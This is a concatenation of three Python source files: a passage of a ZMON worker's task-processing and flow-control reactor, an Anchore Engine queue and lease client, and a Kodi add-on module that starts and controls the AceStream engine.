except Exception:
pass
time.sleep(5) # avoid heavy log spam here
# TODO: some exit condition on failure: maybe when number of consecutive failures > n ?
def process_message(queue, known_tasks, reactor, msg_obj, current_span, sampling_config=None):
"""
Proccess and execute a task.
:param queue: Name of the queue the task comes from
:type queue: str
:param known_tasks: Dictionary of tasks that processor knows how to work with
:type known_tasks: dict
:param reactor: Instance of FlowControlReactor
:type reactor: FlowControlReactor
:param msg_obj: Dictionary that contains the task to process
:type msg_obj: dict
:param current_span: Current OpenTracing span.
:type current_span: opentracing.Span
:param sampling_config: Dict holding all sampling rate info.
:type sampling_config: dict
:return: Return True if the message was processed successfully
:rtype: bool
"""
msg_body = None
body_encoding = msg_obj.get('properties', {}).get('body_encoding')
if body_encoding == "nested":
msg_body = msg_obj["body"]
elif body_encoding == "base64":
msg_body = json.loads(base64.b64decode(msg_obj['body']))
elif body_encoding == "snappy":
msg_body = json.loads(snappy.decompress(base64.b64decode(msg_obj['body'])))
taskname = msg_body['task']
func_args = msg_body['args']
func_kwargs = msg_body['kwargs']
timelimit = msg_body.get('timelimit') # [90, 60]
t_hard, t_soft = timelimit
current_span.set_tag('taskname', taskname)
# we pass task metadata as a kwargs right now, later will be put in the function context by decorator
task_context = {
'queue': queue,
'taskname': taskname,
'delivery_info': msg_obj.get('properties', {}).get('delivery_info', {}),
'task_properties': {
'task': taskname,
'id': msg_body.get('id', ''),
'expires': msg_body.get('expires'), # '2014-09-04T10:27:32.91915200:00'
'timelimit': timelimit, # [90, 60]
'utc': msg_body.get('utc', True),
},
}
# discard tasks that are expired if expire metadata comes with the message
cur_time = datetime.utcnow() if task_context['task_properties']['utc'] else datetime.now()
expire_time = datetime.strptime(
msg_body.get('expires').replace('Z', '').rsplit('+', 1)[0], '%Y-%m-%dT%H:%M:%S.%f') \
if msg_body.get('expires') else cur_time + timedelta(seconds=10)
check_id = (msg_body['args'][0].get('check_id', 'xx') if len(msg_body['args']) > 0 and isinstance(
msg_body['args'][0], dict) else 'XX')
current_span.set_tag('check_id', check_id)
if cur_time >= expire_time:
current_span.set_tag(OPENTRACING_TASK_EXPIRATION, str(expire_time))
logger.warn(
'Discarding task due to time expiration. cur_time: %s , expire_time: %s, check_id: %s, '
'msg_body["expires"]=%s ---- msg_body=%s',
cur_time, expire_time, check_id, msg_body.get('expires'), msg_body)
return False
with reactor.enter_task_context(taskname, t_hard, t_soft):
known_tasks[taskname](*func_args, task_context=task_context, sampling_config=sampling_config, **func_kwargs)
return True
class FlowControlReactor(object):
"""
Implements a singleton object with a permanently running action loop, that can communicate with the
parent process (ProcessController) to request certain actions or submit information about the health
of this worker.
Only implemented capability till now is a "Hard Kill" functionality that kicks in when a task is
taking too long to complete. We use a context manager to signal when we enter or leave this mode of operations.
Future capabilities may include periodical reports to the parent process about number of processed tasks,
mean time spent by the N slowest running tasks. Also a soft kill feature.
"""
_initialized = False
_can_init = False
_instance = None
t_wait = 0.2
ping_timedelta = 30 # send ping data every X seconds
_ping_template = {
'timestamp': None,
'timedelta': None,
'tasks_done': 0,
'percent_idle': 0,
'task_duration': 0.0,
}
_event_template = {
'origin': '',
'type': '',
'body': '',
'timestamp': 0,
'repeats': 0,
}
_max_keep_events = 5000
events_timedelta = 60 # send events every X seconds
def __init__(self):
# self.task_agg_info = {} # we could aggregate some info about how tasks are running in this worker
assert not self._initialized and self._can_init, 'Call get_instance() to instantiate'
self._initialized = True
self._pid = os.getpid()
self._rpc_client = get_rpc_client('http://{}:{}{}'.format(settings.RPC_SERVER_CONF['HOST'],
settings.RPC_SERVER_CONF['PORT'],
settings.RPC_SERVER_CONF['RPC_PATH']))
self._current_task_by_thread = {} # {thread_id: (taskname, t_hard, t_soft, tstart)}
self.action_on = False
self._thread = threading.Thread(target=self.action_loop)
self._thread.daemon = True
self._actions = (self.action_hard_kill, self.action_send_ping, self.action_send_events)
self._ping_data = deepcopy(self._ping_template)
self._ping_lock = threading.RLock()
self._ping_idle_points = [0, 0] # [num_idle_points, num_total_points]
self._t_last_ping = time.time() - self.ping_timedelta * random() # randomize ping start
self._num_ping_sent = -1
self._event_list = []
self._event_lock = threading.RLock()
self._t_last_events = time.time() + self.events_timedelta * random() # randomize event start
@classmethod
def get_instance(cls):
if cls._instance is None:
cls._can_init = True
cls._instance = cls()
return cls._instance
@contextmanager
def enter_task_context(self, taskname, t_hard, t_soft):
self.task_received(taskname, t_hard, t_soft)
try:
yield self
except Exception:
self.task_ended(exc=format_exc()) # self.task_ended(exc=e)
raise
else:
self.task_ended()
def action_hard_kill(self):
""" hard kill logic """
for th_name, (taskname, t_hard, t_soft, ts) in self._current_task_by_thread.copy().items():
if time.time() > ts + t_hard:
msg = 'Hard kill request received for worker pid={}, task={}, t_hard={}, cmdline={}'.format(
self._pid, taskname, t_hard, get_process_cmdline(self._pid)
)
logger.warn(msg)
self.add_event('FlowControlReactor.action_hard_kill', 'ACTION', msg)
self._rpc_client.mark_for_termination(self._pid) # rpc call to parent asking for a kill
self._current_task_by_thread.pop(th_name, {})
def action_send_ping(self):
t_now = time.time()
if t_now - self._t_last_ping >= self.ping_timedelta:
with self._ping_lock:
data = self._ping_data
self._ping_data = deepcopy(self._ping_template)
idle, total = tuple(self._ping_idle_points)
self._ping_idle_points = [0, 0]
data['timestamp'] = t_now
data['timedelta'] = t_now - self._t_last_ping
data['percent_idle'] = (idle * 100.0) / total if total > 0 else 0
# send ping data
if self._num_ping_sent >= 0:
self._rpc_client.ping(self._pid, data) # rpc call to send ping data to parent
self._num_ping_sent += 1
self._t_last_ping = t_now
else:
# update idle info
with self._ping_lock:
self._ping_idle_points[0] += 1 if not self._current_task_by_thread else 0 # idle
self._ping_idle_points[1] += 1 # total
def action_send_events(self):
t_now = time.time()
if t_now - self._t_last_events >= self.events_timedelta:
with self._event_lock:
events = self._event_list
self._event_list = []
# eliminate repeated events, keep last timestamp
event_dict = {}
for e in events[::-1]:
key = (e['origin'], e['type'], e['body'])
if key in event_dict:
event_dict[key]['repeats'] += e['repeats']
else:
event_dict[key] = e
events = sorted(event_dict.values(), key=itemgetter('timestamp'))
if events:
self._rpc_client.add_events(self._pid, events) # rpc call to send events to parent
self._t_last_events = t_now
def add_event(self, origin, type, body, repeats=1):
with self._event_lock:
self._event_list.append(dict(origin=origin, type=type, body=body, repeats=repeats, timestamp=time.time()))
if len(self._event_list) > self._max_keep_events:
self._event_list = self._event_list[-self._max_keep_events:]
def action_loop(self):
while self.action_on:
for action in self._actions:
try:
action()
except Exception:
self.add_event('FlowControlReactor.action_loop', 'ERROR', format_exc())
logger.exception('Scary Error in FlowControlReactor.action_loop(): ')
time.sleep(self.t_wait)
def start(self):
self.action_on = True
self._thread.start()
def stop(self):
self.action_on = False
def task_received(self, taskname, t_hard, t_soft):
# this sets a timer for this task, there is only one task per thread, and right now only main thread produce
self._current_task_by_thread[threading.currentThread().getName()] = (taskname, t_hard, t_soft, time.time())
def task_ended(self, exc=None):
# delete the task from the list
task_detail = self._current_task_by_thread.pop(threading.currentThread().getName(), ())
if not exc:
# update ping data
with self._ping_lock:
self._ping_data['tasks_done'] += 1
if len(list(task_detail)) >= 4:
self._ping_data['task_duration'] += time.time() - list(task_detail)[3]
else:
# register error event
self.add_event('FlowControlReactor.task_ended', 'ERROR', str(exc))
def start_worker_for_queue(flow='simple_queue_processor', queue='zmon:queue:default', **execution_context):
"""
Starting execution point to the workflows
"""
known_flows = {'simple_queue_processor': flow_simple_queue_processor}
if flow not in known_flows:
logger.exception('Bad role: %s' % flow)
sys.exit(1)
logger.info('Starting worker with pid=%s, flow type: %s, queue: %s, execution_context: %s', os.getpid(), flow,
queue, execution_context)
setproctitle.setproctitle('zmon-worker {} {}'.format(flow, queue))
# start Flow Reactor here
FlowControlReactor.get_instance().start()
exit_code = 0
try:
known_flows[flow](queue=queue, **execution_context)
except (KeyboardInterrupt, SystemExit):
logger.warning('Caught user signal to stop consumer: finishing!')
except Exception:
logger.exception('Exception in start_worker(). Details: ')
exit_code = 2
finally:
FlowControlReactor.get_instance().stop()
sys.exit(exit_code)
|
simplequeue.py
|
import json
import threading
import time
from anchore_engine.clients.services import http
from anchore_engine.subsys import logger
from anchore_engine.utils import get_threadbased_id
from anchore_engine.clients.services.internal import InternalServiceClient
import retrying
class LeaseUnavailableError(Exception):
"""
A lease is held by another thread and was not freed within the timeout
"""
pass
class LeaseAcquisitionFailedError(Exception):
"""
A lease could not be acquired due to errors, not simply it being held by another thread
"""
pass
class SimpleQueueClient(InternalServiceClient):
__service__ = 'simplequeue'
def get_queues(self):
return self.call_api(http.anchy_get, '/queues')
def qlen(self, name):
resp = self.round_robin_call_api(http.anchy_get, 'queues/{queue}/qlen', path_params={'queue': name})
return int(resp)
def enqueue(self, name, inobj, qcount=0, forcefirst=False):
return self.round_robin_call_api(http.anchy_post, 'queues/{queue}', path_params={'queue': name}, query_params={'qcount': str(qcount), 'forcefirst': str(forcefirst)}, body=json.dumps(inobj))
def delete_message(self, name, receipt_handle):
return self.round_robin_call_api(http.anchy_delete, path='queues/{queue}', path_params={'queue': name}, query_params={'receipt_handle': receipt_handle})
def is_inqueue(self, name, inobj):
return self.round_robin_call_api(http.anchy_post, path='queues/{queue}/is_inqueue', path_params={'queue': name}, body=json.dumps(inobj))
def dequeue(self, name, visibility_timeout=0, max_wait_seconds=0):
return self.round_robin_call_api(http.anchy_get, 'queues/{queue}', path_params={'queue': name}, query_params={'wait_max_seconds': max_wait_seconds, 'visibility_timeout': visibility_timeout})
def update_message_visibility_timeout(self, name, receipt_handle, visibility_timeout):
return self.round_robin_call_api(http.anchy_put, 'queues/{queue}', path_params={'queue': name}, query_params={'receipt_handle': receipt_handle, 'visibility_timeout': visibility_timeout})
def create_lease(self, lease_id):
return self.round_robin_call_api(http.anchy_post, 'leases', query_params={'lease_id': lease_id})
def list_leases(self):
return self.round_robin_call_api(http.anchy_get, 'leases')
def describe_lease(self, lease_id):
return self.round_robin_call_api(http.anchy_get, 'leases/{lease_id}', path_params={'lease_id': lease_id})
def acquire_lease(self, lease_id, client_id, ttl):
return self.round_robin_call_api(http.anchy_get, 'leases/{lease_id}/acquire', path_params={'lease_id': lease_id}, query_params={'client_id': client_id, 'ttl': ttl})
def release_lease(self, lease_id, client_id, epoch):
return self.round_robin_call_api(http.anchy_get, 'leases/{lease_id}/release', path_params={'lease_id': lease_id}, query_params={'client_id': client_id, 'epoch': epoch})
def refresh_lease(self, lease_id, client_id, epoch, ttl):
return self.round_robin_call_api(http.anchy_put, 'leases/{lease_id}/ttl', path_params={'lease_id': lease_id}, query_params={'client_id': client_id, 'ttl': ttl, 'epoch': epoch})
def run_target_with_queue_ttl(user_auth, queue, visibility_timeout, target, max_wait_seconds=0, autorefresh=True, retries=1, backoff_time=0, *args, **kwargs):
"""
Run a target function with the message pulled from the queue. If autorefresh=True, then run target as a thread and periodically check
for completion, updating the message visibility timeout to keep it fresh until the thread completes.
The function passed as target should expect the message object as the first argument, with *args appended after in the arg list.
:param user_auth:
:param queue:
:param max_wait_seconds:
:param visibility_timeout:
:param target:
:param autorefresh:
:param retries
:param backoff_time
:param args:
:param kwargs:
:return:
"""
client = SimpleQueueClient(as_account=user_auth[0], user=user_auth[0], password=user_auth[1])
ex = None
qobj = None
@retrying.retry(stop_max_attempt_number=retries, wait_incrementing_start=0, wait_incrementing_increment=backoff_time*1000)
def get_msg():
logger.debug("Checking queue {} for message with vis timeout {}".format(queue, visibility_timeout))
return client.dequeue(queue, max_wait_seconds=max_wait_seconds, visibility_timeout=visibility_timeout)
qobj = get_msg()
logger.debug('Got msg: {}'.format(qobj))
if not qobj:
logger.debug("Got empty message from queue - nothing to do")
return(True)
receipt_handle = qobj.get('receipt_handle')
msg_id = qobj.get('id')
if not receipt_handle:
raise Exception('No receipt handle found in queue message: {}'.format(qobj))
try:
# Relies upon the queue configuration of 1 outstanding message (inflight) at a time for serialization across hosts
t = time.time()
if qobj:
args = tuple([qobj] + list(args))
task = threading.Thread(target=target, args=args, kwargs=kwargs)
task.start()
if autorefresh:
# Run the task thread and monitor it, refreshing the task lease as needed
while task.isAlive():
# If we're halfway to the timeout, refresh to have a safe buffer
if time.time() - t > (visibility_timeout / 2):
# refresh the lease
for i in range(3):
try:
resp = client.update_message_visibility_timeout(name=queue, receipt_handle=receipt_handle, visibility_timeout=visibility_timeout)
if resp:
t = time.time()
logger.debug('Msg with handle {} refreshed with new expiration: {}'.format(receipt_handle, resp))
break
except Exception as e:
logger.exception('Error updating visibility timeout {}'.format(receipt_handle))
else:
logger.warn('Visibility refresh failed to succeed after retries. Msg {} may be replayed due to timeout'.format(msg_id))
task.join(timeout=1)
else:
# Just wait for thread to complete
task.join()
except Exception as err:
logger.warn("failed to process task this cycle: " + str(err))
finally:
client.delete_message(queue, receipt_handle)
# Always delete the message. Other handlers will ensure things are queued ok.
def run_target_with_lease(user_auth, lease_id, target, ttl=60, client_id=None, autorefresh=True, *args, **kwargs):
"""
Run a handler within the context of a lease that is auto-refreshed as long as the handler runs.
Uses a thread for the handler and a monitor to watch state and update the lease ttl.
The leases are fairly slow to actuate, so expect to use this mechanism for longer running tasks where the lease duration should be > 10 sec
:param user_auth:
:param lease_id:
:param target:
:param args:
:param kwargs:
:return:
"""
handler_thread = threading.Thread(target=target, args=args, kwargs=kwargs)
client = SimpleQueueClient(as_account=user_auth[0], user=user_auth[0], password=user_auth[1])
# Ensure task lease exists for acquisition and create if not found
lease_resp = client.describe_lease(lease_id)
if not lease_resp:
lease_resp = client.create_lease(lease_id)
if not lease_resp:
raise Exception('Cannot locate or create a lease with id {}'.format(lease_id))
# Acquire the task lease and run the task
lease = None
try:
my_id = get_threadbased_id() if client_id is None else client_id
try:
lease = client.acquire_lease(lease_id, client_id=my_id, ttl=ttl)
if not lease:
raise LeaseUnavailableError('Another owner holds lease {}, and did not release within timeout {}'.format(lease_id, ttl))
except Exception as e:
raise LeaseAcquisitionFailedError('Error during lease acquisition: {}'.format(e))
logger.debug('Got lease: {}'.format(lease))
t = time.time()
logger.debug('Starting target={} with lease={} and client_id={}'.format(target.__name__, lease_id, lease['held_by']))
handler_thread.start()
if autorefresh:
# Run the task thread and monitor it, refreshing the task lease as needed
while handler_thread.isAlive():
# If we're halfway to the timeout, refresh to have a safe buffer
if time.time() - t > (ttl / 2):
# refresh the lease
for i in range(3):
try:
resp = client.refresh_lease(lease_id=lease['id'], client_id=lease['held_by'], epoch=lease['epoch'], ttl=ttl)
logger.debug('Lease {} refreshed with response: {}'.format(lease_id, resp))
if resp:
lease = resp
t = time.time()
break
except Exception as e:
logger.exception('Error updating lease {}'.format(lease['id']))
else:
logger.debug('Lease refresh failed to succeed after retries. Lease {} may be lost due to timeout'.format(lease_id))
handler_thread.join(timeout=1)
else:
handler_thread.join()
logger.debug('Target thread returned')
except (LeaseAcquisitionFailedError, LeaseUnavailableError) as e:
logger.debug('Could not acquire lease, but this may be normal: {}'.format(e))
raise e
except Exception as e:
logger.debug('Attempting to get lease {} failed: {}'.format(lease_id, e))
raise e
finally:
try:
if lease:
resp = client.release_lease(lease_id=lease['id'], client_id=lease['held_by'], epoch=lease['epoch'])
logger.debug('Lease {} released with response: {}'.format(lease_id, resp))
else:
logger.debug('No lease found to release.')
except Exception as e:
logger.exception('Error releasing lease. Lease will expire on its own. Err: {}'.format(str(e)))
|
acecore.py
|
# -*- coding: utf-8 -*-
""" Plexus (c) 2015 enen92
This file contains the acestream console of the addon. Initial versions were coded by Nouismons and so, this file is based on his work.
Classes:
Logger() -> Log class
_TSPlayer(xbmc.Player) -> Inheritance of the xbmc.Player class for acestreams
TSengine() -> Acestreamengine class, start functions, etc
TSServ(threading.Thread) -> Acestreamengine service class
OverlayText(object) -> Overlaytext displayed on player
"""
import xbmcplugin
import xbmcgui
import xbmc
import xbmcaddon
import xbmcvfs
import httplib
import urllib
import urllib2
import re
import sys
import subprocess
import os
import socket
import threading
import time
import random
import json
from plexusutils.pluginxbmc import *
""" Fixed variables """
aceport=int(settings.getSetting('aceporta'))
server_ip=settings.getSetting('ip_addr')
if settings.getSetting('save')=='true': save=False
else: save=False
if settings.getSetting('debug_mode')=='true': alog=True
else: alog=False
if (sys.platform == 'win32') or (sys.platform == 'win64'): pwin=True
else: pwin=False
if xbmc.getCondVisibility('System.Platform.OSX'): posx=True
else: posx=False
""" Function and class list """
def show_Msg(heading, message, times = 3000, pics = addon_icon):
try: xbmc.executebuiltin('XBMC.Notification("%s", "%s", %s, "%s")' % (heading.encode('utf-8'), message.encode('utf-8'), times, pics.encode('utf-8')))
except Exception, e:
print( '[%s]: ShowMessage: Transcoding UTF-8 failed [%s]' % (addon_id, e), 2 )
try: xbmc.executebuiltin('XBMC.Notification("%s", "%s", %s, "%s")' % (heading, message, times, pics))
except Exception, e:
print( '[%s]: ShowMessage: exec failed [%s]' % (addon_id, e), 3 )
class Logger():
def __init__(self,Name):
self.started=False
self.name=Name
self.link=None
def out(self,txt):
if alog:
print "%s:%s"%(self.name,txt)
class _TSPlayer(xbmc.Player):
def __init__( self):
self.started=False
self.log=Logger("TSPlayer")
self.log.out('init')
self.active=True
self.link=None
self.vod=True
self.duration=None
self.coms=[]
if settings.getSetting('force_dvplayer') == 'true': xbmc.Player(xbmc.PLAYER_CORE_DVDPLAYER)
def onPlayBackPaused( self ):
self.log.out('paused')
def onPlayBackStarted( self ):
watcher_thread = threading.Thread(name='acestream_watcher', target=ace_control_thread).start()
xbmc.executebuiltin('XBMC.ActivateWindow("fullscreenvideo")')
self.started=True
self.log.out('started')
if self.vod:
try:
self.duration= int(xbmc.Player().getTotalTime()*1000)
comm='DUR '+self.link.replace('\r','').replace('\n','')+' '+str(self.duration)
self.coms.append(comm)
except: pass
comm='PLAYBACK '+self.link.replace('\r','').replace('\n','')+' 0'
self.coms.append(comm)
xbmc.sleep(2500)
def onPlayBackResumed(self):
self.log.out("play resume")
def onPlayBackEnded(self):
self.log.out("play ended")
self.active=False
comm='PLAYBACK '+self.link.replace('\r','').replace('\n','')+' 100'
self.coms.append(comm)
def onPlayBackStopped(self):
self.log.out("play stop")
self.active=False
if settings.getSetting('engine-status') == "true":
try:lat123._close()
except:pass
def __del__(self):
self.log.out('delete')
class TSengine():
def __init__(self):
xbmc.Player().stop()
self.log=Logger("TSEngine")
self.push=Logger('OUT')
self.alive=True
self.progress = xbmcgui.DialogProgress()
self.player=None
self.files={}
self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._sock.settimeout(3)
self.progress.create(translate(30000),translate(30043))
self.tsserv =None
self.conn=False
self.title=None
self.filename=None
self.mode=None
self.url=None
self.local=False
self.saved=False
self.canceled = False
self.pos=[25,50,75,100]
l=False
while xbmc.Player().isPlaying():
l=True
if xbmc.abortRequested:
self.log.out("XBMC asked to abort request")
return False
if self.progress.iscanceled():
self.canceled = True
return False
xbmc.sleep(300)
settings.setSetting('active','1')
if l: xbmc.sleep(500)
def ts_init(self):
self.tsserv = TSServ(self._sock)
self.tsserv.start()
comm="HELLOBG"
self.TSpush(comm)
self.progress.update(0,translate(30044)," ")
while not self.tsserv.version:
if xbmc.abortRequested:
self.canceled = True
self.log.out("XBMC asked to abort request")
return False
if self.progress.iscanceled():
self.canceled = True
return False
time.sleep(1)
ready='READY'
if self.tsserv.key:
import hashlib
sha1 = hashlib.sha1()
pkey=self.tsserv.pkey
sha1.update(self.tsserv.key+pkey)
key=sha1.hexdigest()
pk=pkey.split('-')[0]
key="%s-%s"%(pk,key)
ready='READY key=%s'% key
if self.progress.iscanceled():
self.canceled = True
self.err=1
return False
self.TSpush(ready)
return True
def sm(self,msg):
show_Msg('AceStream',msg)
def connect(self):
server_ip='127.0.0.1'
servip=settings.getSetting('ip_addr')
aceport=int(settings.getSetting('aceporta'))
self.log.out('Trying to connect')
self.progress.update(0,translate(30045),' ')
if pwin:
res=self.startWin()
aceport=self.getWinPort()
if not aceport:
res=self.startWin()
if not res: return False
elif posx:
res=self.startosx()
aceport=self.getosxPort()
if not aceport:
res=self.startosx()
if not res: return False
else:
self.log.out('try to connect to Linux engine')
self.log.out('Connecting to %s:%s'%(servip,aceport))
try:
self._sock.connect((servip, aceport))
self.log.out('Connected to %s:%s'%(servip,aceport))
return True
except:
res=self.startLin()
if not res: return False
i=40
while (i>1):
self.progress.update(0,translate(30046),translate(30047) + str('%s'%i) + ' ' + translate(30048) )
try:
if pwin: aceport=self.getWinPort()
elif posx: aceport=self.getosxPort()
self._sock.connect((servip, aceport))
self.log.out('Connected to %s:%s'%(servip,aceport))
i=0
return True
except:
self.log.out('Failed to connect to %s:%s'%(servip,aceport))
if self.progress.iscanceled():
self.canceled = True
return False
break
i=i-1
xbmc.sleep(1000)
if xbmc.getCondVisibility('system.platform.OSX'):
j = [33,30,27,24,21,18,15,12,9,6,3]
if i in j:
print("another attempt to start osx engine..")
self.startosx()
self._sock.close()
self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sm('Cant connect')
return False
def getosxPort(self):
try:
path=os.path.join('/Applications','Ace Stream.app','Contents','Resources','wineprefix','drive_c','users','IGHOR','Application Data','ACEStream','engine')
pfile= os.path.join( path,'acestream.port')
gf = open(pfile, 'r')
aceport=int(gf.read())
except:
return False
self.log.out('get aceport - %s'%aceport)
return aceport
def startosx(self):
self.log.out('try to start OSX engine')
import subprocess
comd = [os.path.join('/Applications','Ace Stream.app','Contents','Resources','Wine.bundle','Contents','Resources','bin','wine'),os.path.join('/Applications','Ace Stream.app','Contents','Resources','wineprefix','drive_c','users','IGHOR','Application Data','ACEStream','engine','ace_engine.exe')]
print comd
try:
self.proc = subprocess.Popen(comd,shell=False)
except:
self.sm('Not Installed')
self.log.out('Not Installed')
self.progress.update(0,'AceStream not installed','')
return False
self.log.out('Engine starting')
return True
def startLin(self):
self.log.out('try to start Lin engine')
import subprocess
if xbmc.getCondVisibility('System.Platform.Android'):
try:
if settings.getSetting('engine_app') == "1"and settings.getSetting("acemedia") == "1": xbmc.executebuiltin('XBMC.StartAndroidActivity("org.acestream.media")')
elif settings.getSetting('engine_app') == "1"and settings.getSetting("acemedia") == "0": xbmc.executebuiltin('XBMC.StartAndroidActivity("org.acestream.engine")')
else:
command = ["sh","/data/data/"+settings.getSetting('app_id')+"/files/program.plexus/org.acestream.engine/files/droidace.sh",settings.getSetting('app_id')]
if settings.getSetting('total_max_download_rate') != "0":
command.append('--download-limit')
command.append(settings.getSetting('total_max_download_rate'))
if settings.getSetting('total_max_upload_rate') != "0":
command.append('--upload-limit')
command.append(settings.getSetting('total_max_upload_rate'))
self.proc = subprocess.Popen(command)
except:
self.sm("Not installed")
self.log.out("Not installed")
self.progress.update(0,"Acestreamengine.apk not installed","")
else:
print("Linux not android..")
if "arm" in os.uname()[4]:
try:
command = ["sh",os.path.join(pastaperfil,"acestream","start_acestream.sh"),"--client-console"]
if settings.getSetting('total_max_download_rate') != "0":
command.append('--download-limit')
command.append(settings.getSetting('total_max_download_rate'))
if settings.getSetting('total_max_upload_rate') != "0":
command.append('--upload-limit')
command.append(settings.getSetting('total_max_upload_rate'))
self.proc = subprocess.Popen(command)
except:
self.sm("Not installed")
self.log.out("Not installed")
self.progress.update(0,"Acestream engine not installed")
elif settings.getSetting('openeleci386') == "true" or settings.getSetting('openelecx86_64') == "true":
try:
command = ["sh",os.path.join(pastaperfil,'acestream','start.sh')]
if settings.getSetting('total_max_download_rate') != "0":
command.append('--download-limit')
command.append(settings.getSetting('total_max_download_rate'))
if settings.getSetting('total_max_upload_rate') != "0":
command.append('--upload-limit')
command.append(settings.getSetting('total_max_upload_rate'))
self.proc = subprocess.Popen(command)
except:
self.sm("Not installed")
self.log.out("Not installed")
self.progress.update(0,"Acestream engine not installed")
else:
print("Not armv7 or armv6")
if settings.getSetting('ace_cmd') == "0":
acefolder = os.path.join(pastaperfil,'acestream')
acebin = os.path.join(pastaperfil,'acestream','acestreamengine')
command = [acebin,'--client-console','--lib-path',acefolder]
if settings.getSetting('total_max_download_rate') != "0":
command.append('--download-limit')
command.append(settings.getSetting('total_max_download_rate'))
if settings.getSetting('total_max_upload_rate') != "0":
command.append('--upload-limit')
command.append(settings.getSetting('total_max_upload_rate'))
print command
elif settings.getSetting('ace_cmd') == "1": command = ["acestreamengine","--client-console"]
elif settings.getSetting('ace_cmd') == "2": command = settings.getSetting('ace_cmd_alternative').split(' ')
try:
self.proc = subprocess.Popen(command)
except:
self.sm('Not Installed')
self.log.out('Not Installed')
self.progress.update(0,'AceStream not installed','')
return False
self.log.out('Engine starting')
return True
def startWin(self):
try:
needed_value='ace_engine.exe'
path_value=os.path.join(pastaperfil,'acestream',needed_value)
self.log.out("Try to start %s"%needed_value)
self.progress.update(0,'Starting ASEngine','')
os.startfile(path_value)
self.log.out('AceStream Engine starting')
except:
self.sm('Not Installed')
self.log.out('Not Installed')
self.progress.update(0,'AceStream not installed','')
return False
return True
def getWinPort(self):
try:
path=os.path.join(pastaperfil,'acestream')
pfile= os.path.join( path,'acestream.port')
gf = open(pfile, 'r')
aceport=int(gf.read())
except:
return False
self.log.out('get aceport - %s'%aceport)
return aceport
def TSpush(self,command):
self.push.out(command)
try:
self._sock.send(command+'\r\n')
except:
self.push.out("!!!Error!!!")
def get_link(self, index=0, title='', icon='', thumb=''):
self.title=title
self.log.out("play")
self.tsserv.ind=index
self.progress.update(89,translate(30049),'')
for k,v in self.files.iteritems():
if v==index: self.filename=urllib.unquote(k).replace('/','_').replace('\\','_')
try:
avail=os.path.exists(self.filename.decode('utf-8'))
except:
try:
avail=os.path.exists(self.filename)
self.filename=self.filename.encode('utf-8')
except: self.filename='temp.avi'
self.log.out('Starting file:%s'%self.filename)
try: self.filename=settings.getSetting('folder')+self.filename
except:
self.filename=None
save=False
self.log.out('Get filename to save:%s'%self.filename)
spons=''
if self.mode!='PID': spons=' 0 0 0'
comm='START '+self.mode+ ' ' + self.url + ' '+ str(index) + spons
self.TSpush(comm)
self.progress.update(89,translate(30050),'')
while not self.tsserv.got_url and not self.progress.iscanceled() and not self.tsserv.err:
self.progress.update(int(self.tsserv.proc),self.tsserv.label,self.tsserv.line)
xbmc.sleep(200)
if self.progress.iscanceled():
self.canceled = True
if xbmc.abortRequested:
self.log.out("XBMC is shutting down")
self.canceled = True
break
if self.tsserv.err:
self.sm('Failed to load file')
self.canceled = True
self.progress.update(100,translate(30049),'')
if settings.getSetting('save')=='true': save=True
else: save=False
if self.tsserv.event and save:
self.progress.update(0,translate(30051)," ")
comm='SAVE %s path=%s'%(self.tsserv.event[0]+' '+self.tsserv.event[1],urllib.quote(self.filename))
self.TSpush(comm)
self.tsserv.event=None
succ=True
while not os.path.exists(self.filename.decode('utf-8')) and not self.progress.iscanceled():
if xbmc.abortRequested or self.progress.iscanceled():
self.log.out("XBMC asked to abort request")
succ=False
self.canceled = True
break
xbmc.sleep(200)
if not succ: return False
self.tsserv.got_url=self.filename.decode('utf-8')
self.local=True
self.active=True
self.progress.close()
return self.tsserv.got_url
def play_url_ind(self, index=0, title='', icon='', thumb=''):
self.lnk=self.get_link(index,title,icon,thumb)
if not self.lnk: return False
if settings.getSetting('aceplay_type') == str(1):
if ":6878/" in self.lnk: self.lnk = self.lnk.replace(":6878",":" + settings.getSetting('playerport'))
if self.progress:self.progress.close()
item = xbmcgui.ListItem(title,iconImage="DefaultVideo.png", thumbnailImage=thumb)
item.setPath(path=self.lnk)
if settings.getSetting('engine-status') == "true":
global lat123
lat123 = OverlayText()
xbmcplugin.setResolvedUrl(int(sys.argv[1]),True,item)
xbmc.sleep(100)
self.player=_TSPlayer()
self.player.vod=True
self.player.link=self.tsserv.got_url
self.log.out('play')
self.player.link=self.lnk
if self.progress:self.progress.close()
if self.local:
if int(sys.argv[1]) < 0:
xbmc.Player().play(self.lnk,item)
else:
xbmc.sleep(50)
if int(sys.argv[1]) < 0:
self.player.play(self.lnk,item)
show_window = False
while self.player.active and not self.local:
if settings.getSetting('engine-status') == "true":
if show_window == False and xbmc.getCondVisibility('Window.IsActive(videoosd)'):
lat123.show()
show_window = True
elif not xbmc.getCondVisibility('Window.IsActive(videoosd)'):
try:
lat123.hide()
except: pass
show_window = False
self.loop()
xbmc.sleep(300)
if xbmc.abortRequested:
self.canceled = True
self.log.out("XBMC asked to abort request")
break
self.log.out('ended play')
def loop(self):
pos=self.pos
if len(self.player.coms)>0:
comm=self.player.coms[0]
self.player.coms.remove(comm)
self.TSpush(comm)
if self.player.isPlaying():
if self.player.getTotalTime()>0: cpos= int((1-(self.player.getTotalTime()-self.player.getTime())/self.player.getTotalTime())*100)
else: cpos=0
if cpos in pos:
pos.remove(cpos)
comm='PLAYBACK '+self.player.link.replace('\r','').replace('\n','')+' %s'%cpos
self.TSpush(comm)
if self.tsserv.event and save:
self.log.out('Try to save file in loop')
comm='SAVE %s path=%s'%(self.tsserv.event[0]+' '+self.tsserv.event[1],urllib.quote(self.filename))
self.TSpush(comm)
self.tsserv.event=None
succ=True
self.saved=True
if self.saved and self.player.started:
self.log.out('saving content')
if self.player.isPlaying() and os.path.exists(self.filename.decode('utf-8')):
xbmc.sleep(10000)
self.log.out('Start local file')
self.tsserv.got_url=self.filename
self.local=True
self.sm('Start Local File')
try: time1=self.player.getTime()
except: time1=0
i = xbmcgui.ListItem("***%s"%self.title)
i.setProperty('StartOffset', str(time1))
self.log.out('Play local file')
self.local=True
self.player.active=False
def load_torrent(self, torrent, mode, host=server_ip, port=aceport ):
self.mode=mode
self.url=torrent
if not self.connect():
return False
if not self.ts_init():
self.sm('Initialization Failed')
return False
self.conn=True
self.progress.update(0,translate(30052),"")
if mode!='PID': spons=' 0 0 0'
else: spons=''
comm='LOADASYNC '+ str(random.randint(0, 0x7fffffff)) +' '+mode+' ' + torrent + spons
self.TSpush(comm)
